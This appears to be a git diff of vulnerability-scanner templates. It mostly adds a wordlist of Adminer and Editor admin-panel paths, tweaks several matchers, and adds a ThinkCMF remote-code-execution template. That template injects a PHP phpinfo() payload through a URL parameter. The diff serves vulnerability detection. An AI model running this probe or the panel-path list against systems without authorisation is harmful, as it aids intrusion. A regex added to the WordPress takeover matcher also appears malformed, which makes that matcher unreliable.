+/adminer-4.7.6-mysql-pl.php
+/adminer-4.7.6-mysql-sk.php
+/adminer-4.7.6-mysql.php
+/adminer-4.7.6-pl.php
+/adminer-4.7.6-sk.php
+/adminer-4.7.6.php
+/adminer-4.7.6/
+/adminer-4.7.7-cs.php
+/adminer-4.7.7-de.php
+/adminer-4.7.7-en.php
+/adminer-4.7.7-mysql-cs.php
+/adminer-4.7.7-mysql-de.php
+/adminer-4.7.7-mysql-en.php
+/adminer-4.7.7-mysql-pl.php
+/adminer-4.7.7-mysql-sk.php
+/adminer-4.7.7-mysql.php
+/adminer-4.7.7-pl.php
+/adminer-4.7.7-sk.php
+/adminer-4.7.7.php
+/adminer-4.7.7/
+/adminer-4.7.8-cs.php
+/adminer-4.7.8-de.php
+/adminer-4.7.8-en.php
+/adminer-4.7.8-mysql-cs.php
+/adminer-4.7.8-mysql-de.php
+/adminer-4.7.8-mysql-en.php
+/adminer-4.7.8-mysql-pl.php
+/adminer-4.7.8-mysql-sk.php
+/adminer-4.7.8-mysql.php
+/adminer-4.7.8-pl.php
+/adminer-4.7.8-sk.php
+/adminer-4.7.8.php
+/adminer-4.7.8/
+/adminer-4.7.9-cs.php
+/adminer-4.7.9-de.php
+/adminer-4.7.9-en.php
+/adminer-4.7.9-mysql-cs.php
+/adminer-4.7.9-mysql-de.php
+/adminer-4.7.9-mysql-en.php
+/adminer-4.7.9-mysql-pl.php
+/adminer-4.7.9-mysql-sk.php
+/adminer-4.7.9-mysql.php
+/adminer-4.7.9-pl.php
+/adminer-4.7.9-sk.php
+/adminer-4.7.9.php
+/adminer-4.7.9/
+/adminer-4.8.0-cs.php
+/adminer-4.8.0-de.php
+/adminer-4.8.0-en.php
+/adminer-4.8.0-mysql-cs.php
+/adminer-4.8.0-mysql-de.php
+/adminer-4.8.0-mysql-en.php
+/adminer-4.8.0-mysql-pl.php
+/adminer-4.8.0-mysql-sk.php
+/adminer-4.8.0-mysql.php
+/adminer-4.8.0-pl.php
+/adminer-4.8.0-sk.php
+/adminer-4.8.0.php
+/adminer-4.8.0/
+/adminer-mysql.php
+/adminer.php
+/adminer/
+/adminer/adminer.php
+/adminer1.php
+/data/adminer.php
+/editor-3.0.1-mysql-en.php
+/editor-3.0.1-mysql.php
+/editor-3.0.1.php
+/editor-3.1.0-mysql-en.php
+/editor-3.1.0-mysql.php
+/editor-3.1.0.php
+/editor-3.2.0-mysql-en.php
+/editor-3.2.0-mysql.php
+/editor-3.2.0.php
+/editor-3.2.2-mysql-en.php
+/editor-3.2.2-mysql.php
+/editor-3.2.2.php
+/editor-3.3.0-mysql-en.php
+/editor-3.3.0-mysql.php
+/editor-3.3.0.php
+/editor-3.3.1-mysql-en.php
+/editor-3.3.1-mysql.php
+/editor-3.3.1.php
+/editor-3.3.3-mysql-en.php
+/editor-3.3.3-mysql.php
+/editor-3.3.3.php
+/editor-3.3.4-mysql-en.php
+/editor-3.3.4-mysql.php
+/editor-3.3.4.php
+/editor-3.4.0-mysql-en.php
+/editor-3.4.0-mysql.php
+/editor-3.4.0.php
+/editor-3.5.1-mysql-en.php
+/editor-3.5.1-mysql.php
+/editor-3.5.1.php
+/editor-3.6.1-mysql-en.php
+/editor-3.6.1-mysql.php
+/editor-3.6.1.php
+/editor-3.6.2-mysql-en.php
+/editor-3.6.2-mysql.php
+/editor-3.6.2.php
+/editor-3.6.3-mysql-en.php
+/editor-3.6.3-mysql.php
+/editor-3.6.3.php
+/editor-3.6.4-mysql-en.php
+/editor-3.6.4-mysql.php
+/editor-3.6.4.php
+/editor-3.7.0-mysql-en.php
+/editor-3.7.0-mysql.php
+/editor-3.7.0.php
+/editor-3.7.1-mysql-en.php
+/editor-3.7.1-mysql.php
+/editor-3.7.1.php
+/editor-4.0.1-en.php
+/editor-4.0.1-mysql-en.php
+/editor-4.0.1-mysql.php
+/editor-4.0.1.php
+/editor-4.0.2-en.php
+/editor-4.0.2-mysql-en.php
+/editor-4.0.2-mysql.php
+/editor-4.0.2.php
+/editor-4.0.3-en.php
+/editor-4.0.3-mysql-en.php
+/editor-4.0.3-mysql.php
+/editor-4.0.3.php
+/editor-4.1.0-en.php
+/editor-4.1.0-mysql-en.php
+/editor-4.1.0-mysql.php
+/editor-4.1.0.php
+/editor-4.2.0-en.php
+/editor-4.2.0-mysql-en.php
+/editor-4.2.0-mysql.php
+/editor-4.2.0.php
+/editor-4.2.1-en.php
+/editor-4.2.1-mysql-en.php
+/editor-4.2.1-mysql.php
+/editor-4.2.1.php
+/editor-4.2.2-en.php
+/editor-4.2.2-mysql-en.php
+/editor-4.2.2-mysql.php
+/editor-4.2.2.php
+/editor-4.2.3-en.php
+/editor-4.2.3-mysql-en.php
+/editor-4.2.3-mysql.php
+/editor-4.2.3.php
+/editor-4.2.4-en.php
+/editor-4.2.4-mysql-en.php
+/editor-4.2.4-mysql.php
+/editor-4.2.4.php
+/editor-4.2.5-cs.php
+/editor-4.2.5-de.php
+/editor-4.2.5-en.php
+/editor-4.2.5-mysql-cs.php
+/editor-4.2.5-mysql-de.php
+/editor-4.2.5-mysql-en.php
+/editor-4.2.5-mysql-pl.php
+/editor-4.2.5-mysql-sk.php
+/editor-4.2.5-mysql.php
+/editor-4.2.5-pl.php
+/editor-4.2.5-sk.php
+/editor-4.2.5.php
+/editor-4.3.0-cs.php
+/editor-4.3.0-de.php
+/editor-4.3.0-en.php
+/editor-4.3.0-mysql-cs.php
+/editor-4.3.0-mysql-de.php
+/editor-4.3.0-mysql-en.php
+/editor-4.3.0-mysql-pl.php
+/editor-4.3.0-mysql-sk.php
+/editor-4.3.0-mysql.php
+/editor-4.3.0-pl.php
+/editor-4.3.0-sk.php
+/editor-4.3.0.php
+/editor-4.3.1-cs.php
+/editor-4.3.1-de.php
+/editor-4.3.1-en.php
+/editor-4.3.1-mysql-cs.php
+/editor-4.3.1-mysql-de.php
+/editor-4.3.1-mysql-en.php
+/editor-4.3.1-mysql-pl.php
+/editor-4.3.1-mysql-sk.php
+/editor-4.3.1-mysql.php
+/editor-4.3.1-pl.php
+/editor-4.3.1-sk.php
+/editor-4.3.1.php
+/editor-4.4.0-cs.php
+/editor-4.4.0-de.php
+/editor-4.4.0-en.php
+/editor-4.4.0-mysql-cs.php
+/editor-4.4.0-mysql-de.php
+/editor-4.4.0-mysql-en.php
+/editor-4.4.0-mysql-pl.php
+/editor-4.4.0-mysql-sk.php
+/editor-4.4.0-mysql.php
+/editor-4.4.0-pl.php
+/editor-4.4.0-sk.php
+/editor-4.4.0.php
+/editor-4.5.0-cs.php
+/editor-4.5.0-de.php
+/editor-4.5.0-en.php
+/editor-4.5.0-mysql-cs.php
+/editor-4.5.0-mysql-de.php
+/editor-4.5.0-mysql-en.php
+/editor-4.5.0-mysql-pl.php
+/editor-4.5.0-mysql-sk.php
+/editor-4.5.0-mysql.php
+/editor-4.5.0-pl.php
+/editor-4.5.0-sk.php
+/editor-4.5.0.php
+/editor-4.6.0-cs.php
+/editor-4.6.0-de.php
+/editor-4.6.0-en.php
+/editor-4.6.0-mysql-cs.php
+/editor-4.6.0-mysql-de.php
+/editor-4.6.0-mysql-en.php
+/editor-4.6.0-mysql-pl.php
+/editor-4.6.0-mysql-sk.php
+/editor-4.6.0-mysql.php
+/editor-4.6.0-pl.php
+/editor-4.6.0-sk.php
+/editor-4.6.0.php
+/editor-4.6.1-cs.php
+/editor-4.6.1-de.php
+/editor-4.6.1-en.php
+/editor-4.6.1-mysql-cs.php
+/editor-4.6.1-mysql-de.php
+/editor-4.6.1-mysql-en.php
+/editor-4.6.1-mysql-pl.php
+/editor-4.6.1-mysql-sk.php
+/editor-4.6.1-mysql.php
+/editor-4.6.1-pl.php
+/editor-4.6.1-sk.php
+/editor-4.6.1.php
+/editor-4.6.2-cs.php
+/editor-4.6.2-de.php
+/editor-4.6.2-en.php
+/editor-4.6.2-mysql-cs.php
+/editor-4.6.2-mysql-de.php
+/editor-4.6.2-mysql-en.php
+/editor-4.6.2-mysql-pl.php
+/editor-4.6.2-mysql-sk.php
+/editor-4.6.2-mysql.php
+/editor-4.6.2-pl.php
+/editor-4.6.2-sk.php
+/editor-4.6.2.php
+/editor-4.6.3-cs.php
+/editor-4.6.3-de.php
+/editor-4.6.3-en.php
+/editor-4.6.3-mysql-cs.php
+/editor-4.6.3-mysql-de.php
+/editor-4.6.3-mysql-en.php
+/editor-4.6.3-mysql-pl.php
+/editor-4.6.3-mysql-sk.php
+/editor-4.6.3-mysql.php
+/editor-4.6.3-pl.php
+/editor-4.6.3-sk.php
+/editor-4.6.3.php
+/editor-4.7.0-cs.php
+/editor-4.7.0-de.php
+/editor-4.7.0-en.php
+/editor-4.7.0-mysql-cs.php
+/editor-4.7.0-mysql-de.php
+/editor-4.7.0-mysql-en.php
+/editor-4.7.0-mysql-pl.php
+/editor-4.7.0-mysql-sk.php
+/editor-4.7.0-mysql.php
+/editor-4.7.0-pl.php
+/editor-4.7.0-sk.php
+/editor-4.7.0.php
+/editor-4.7.1-cs.php
+/editor-4.7.1-de.php
+/editor-4.7.1-en.php
+/editor-4.7.1-mysql-cs.php
+/editor-4.7.1-mysql-de.php
+/editor-4.7.1-mysql-en.php
+/editor-4.7.1-mysql-pl.php
+/editor-4.7.1-mysql-sk.php
+/editor-4.7.1-mysql.php
+/editor-4.7.1-pl.php
+/editor-4.7.1-sk.php
+/editor-4.7.1.php
+/editor-4.7.2-cs.php
+/editor-4.7.2-de.php
+/editor-4.7.2-en.php
+/editor-4.7.2-mysql-cs.php
+/editor-4.7.2-mysql-de.php
+/editor-4.7.2-mysql-en.php
+/editor-4.7.2-mysql-pl.php
+/editor-4.7.2-mysql-sk.php
+/editor-4.7.2-mysql.php
+/editor-4.7.2-pl.php
+/editor-4.7.2-sk.php
+/editor-4.7.2.php
+/editor-4.7.3-cs.php
+/editor-4.7.3-de.php
+/editor-4.7.3-en.php
+/editor-4.7.3-mysql-cs.php
+/editor-4.7.3-mysql-de.php
+/editor-4.7.3-mysql-en.php
+/editor-4.7.3-mysql-pl.php
+/editor-4.7.3-mysql-sk.php
+/editor-4.7.3-mysql.php
+/editor-4.7.3-pl.php
+/editor-4.7.3-sk.php
+/editor-4.7.3.php
+/editor-4.7.4-cs.php
+/editor-4.7.4-de.php
+/editor-4.7.4-en.php
+/editor-4.7.4-mysql-cs.php
+/editor-4.7.4-mysql-de.php
+/editor-4.7.4-mysql-en.php
+/editor-4.7.4-mysql-pl.php
+/editor-4.7.4-mysql-sk.php
+/editor-4.7.4-mysql.php
+/editor-4.7.4-pl.php
+/editor-4.7.4-sk.php
+/editor-4.7.4.php
+/editor-4.7.5-cs.php
+/editor-4.7.5-de.php
+/editor-4.7.5-en.php
+/editor-4.7.5-mysql-cs.php
+/editor-4.7.5-mysql-de.php
+/editor-4.7.5-mysql-en.php
+/editor-4.7.5-mysql-pl.php
+/editor-4.7.5-mysql-sk.php
+/editor-4.7.5-mysql.php
+/editor-4.7.5-pl.php
+/editor-4.7.5-sk.php
+/editor-4.7.5.php
+/editor-4.7.6-cs.php
+/editor-4.7.6-de.php
+/editor-4.7.6-en.php
+/editor-4.7.6-mysql-cs.php
+/editor-4.7.6-mysql-de.php
+/editor-4.7.6-mysql-en.php
+/editor-4.7.6-mysql-pl.php
+/editor-4.7.6-mysql-sk.php
+/editor-4.7.6-mysql.php
+/editor-4.7.6-pl.php
+/editor-4.7.6-sk.php
+/editor-4.7.6.php
+/editor-4.7.7-cs.php
+/editor-4.7.7-de.php
+/editor-4.7.7-en.php
+/editor-4.7.7-mysql-cs.php
+/editor-4.7.7-mysql-de.php
+/editor-4.7.7-mysql-en.php
+/editor-4.7.7-mysql-pl.php
+/editor-4.7.7-mysql-sk.php
+/editor-4.7.7-mysql.php
+/editor-4.7.7-pl.php
+/editor-4.7.7-sk.php
+/editor-4.7.7.php
+/editor-4.7.8-cs.php
+/editor-4.7.8-de.php
+/editor-4.7.8-en.php
+/editor-4.7.8-mysql-cs.php
+/editor-4.7.8-mysql-de.php
+/editor-4.7.8-mysql-en.php
+/editor-4.7.8-mysql-pl.php
+/editor-4.7.8-mysql-sk.php
+/editor-4.7.8-mysql.php
+/editor-4.7.8-pl.php
+/editor-4.7.8-sk.php
+/editor-4.7.8.php
+/editor-4.7.9-cs.php
+/editor-4.7.9-de.php
+/editor-4.7.9-en.php
+/editor-4.7.9-mysql-cs.php
+/editor-4.7.9-mysql-de.php
+/editor-4.7.9-mysql-en.php
+/editor-4.7.9-mysql-pl.php
+/editor-4.7.9-mysql-sk.php
+/editor-4.7.9-mysql.php
+/editor-4.7.9-pl.php
+/editor-4.7.9-sk.php
+/editor-4.7.9.php
+/editor-4.8.0-cs.php
+/editor-4.8.0-de.php
+/editor-4.8.0-en.php
+/editor-4.8.0-mysql-cs.php
+/editor-4.8.0-mysql-de.php
+/editor-4.8.0-mysql-en.php
+/editor-4.8.0-mysql-pl.php
+/editor-4.8.0-mysql-sk.php
+/editor-4.8.0-mysql.php
+/editor-4.8.0-pl.php
+/editor-4.8.0-sk.php
+/editor-4.8.0.php
+/editor-mysql.php
+/editor.php
+/editor/
+/mysql.php
+/php/adminer.php
+/phpmyadmin.php
+/public/adminer.php
+/sql.php
+/tools/adminer.php
+/web/adminer.php
+/wp-content/plugins/adminer/adminer.php
--- a/misconfiguration/put-method-enabled.yaml
+++ b/misconfiguration/put-method-enabled.yaml
@ -24,4 +24,4 @@ requests:
      - type: dsl
        name: multi-req
        dsl:
-          - 'contains(body_2, "testing-payload") == true'
+          - 'contains(body_2, "testing-payload")'
--- a/takeovers/wordpress-takeover.yaml
+++ b/takeovers/wordpress-takeover.yaml
@ -1,10 +1,10 @@
 id: wordpress-takeover

 info:
-  name: wordpress takeover detection
-  author: pdcommunity
+  name: WordPress takeover detection
+  author: pdcommunity & geeknik
  severity: high
-  tags: takeover
+  tags: takeover,wordpress
  reference: https://github.com/EdOverflow/can-i-take-over-xyz

 requests:
@ -12,9 +12,13 @@ requests:
    path:
      - "{{BaseURL}}"

+    redirects: true
+    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'Do you want to register'
-          - '*.wordpress.com'
-        condition: and
+
+      - type: regex
+        regex:
+          - "[a-zA-Z0-9][a-zA-Z0-9-_]*\\.)*[a-zA-Z0-9]*[a-zA-Z0-9-_]*[[a-zA-Z0-9].wordpress.com"
--- a/vulnerabilities/other/powercreator-cms-rce.yaml
+++ b/vulnerabilities/other/powercreator-cms-rce.yaml
@ -41,4 +41,4 @@ requests:
    matchers:
      - type: dsl
        dsl:
-          - "contains(body, 'Poc_Test') == true && status_code == 200"
+          - "contains(body, 'Poc_Test') && status_code == 200"
--- a/vulnerabilities/thinkcmf/thinkcmf-arbitrary-code-execution.yaml
+++ b/vulnerabilities/thinkcmf/thinkcmf-arbitrary-code-execution.yaml
@ -0,0 +1,27 @@
+id: thinkcmf-arbitrary-code-execution
+
+info:
+  name: ThinkCMF Arbitrary code execution
+  author: pikpikcu
+  severity: high
+  reference: https://www.shuzhiduo.com/A/l1dygr36Je/
+  tags: thinkcmf
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?g=g&m=Door&a=index&content=<?php%20phpinfo();"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "PHP Extension"
+          - "PHP Version"
+          - "PHP License"
+          - "PHP Variables"
+        condition: and
+
+      - type: status
+        status:
+          - 200
--- a/workflows/wordpress-workflow.yaml
+++ b/workflows/wordpress-workflow.yaml
@ -11,6 +11,8 @@ workflows:
    matchers:
      - name: wordpress
        subtemplates:
+          - template: cves/2016/CVE-2016-10033.yaml
+          - template: cves/2017/CVE-2017-1000170.yaml
          - template: cves/2018/CVE-2018-3810.yaml
          - template: cves/2019/CVE-2019-6112.yaml
          - template: cves/2019/CVE-2019-6715.yaml
@ -26,6 +28,7 @@ workflows:
          - template: cves/2020/CVE-2020-13700.yaml
          - template: cves/2020/CVE-2020-14092.yaml
          - template: cves/2020/CVE-2020-35951.yaml
+          - template: cves/2020/CVE-2020-35489.yaml
          - template: vulnerabilities/wordpress/wordpress-auth-bypass-wptimecapsule.yaml
          - template: vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml
          - template: vulnerabilities/wordpress/wordpress-total-upkeep-backup-download.yaml